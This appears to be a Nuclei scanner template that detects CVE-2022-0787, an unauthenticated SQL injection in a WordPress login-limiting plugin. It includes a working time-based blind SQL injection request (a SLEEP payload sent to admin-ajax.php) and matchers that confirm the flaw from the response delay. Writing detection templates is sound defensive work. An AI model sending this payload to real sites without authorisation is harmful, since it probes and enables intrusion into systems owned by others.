id: CVE-2022-0787 info: name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection author: theamanrawat severity: critical description: | The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections. remediation: Fixed in version 5.1 reference: - https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd - https://wordpress.org/plugins/wp-limit-failed-login-attempts/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0787 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0787 cwe-id: CWE-89 epss-score: 0.03633 epss-percentile: 0.90761 cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: limit_login_attempts_project product: limit_login_attempts framework: wordpress tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project http: - raw: - | @timeout: 15s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU) matchers: - type: dsl dsl: - duration>=6 - status_code == 200 - contains(header, "text/html") - contains(body, 'iTotalDisplayRecords') condition: and # digest: 4a0a00473045022054de99c034c15fa462452b6a9d788b0dfc17fe1f5dd2f73f46396df264c9181a022100e586cc288186418145a8b25fe6caeba749589d98fe5abfb429d5004871f58172:922c64590222798bb761d5b6d8e72950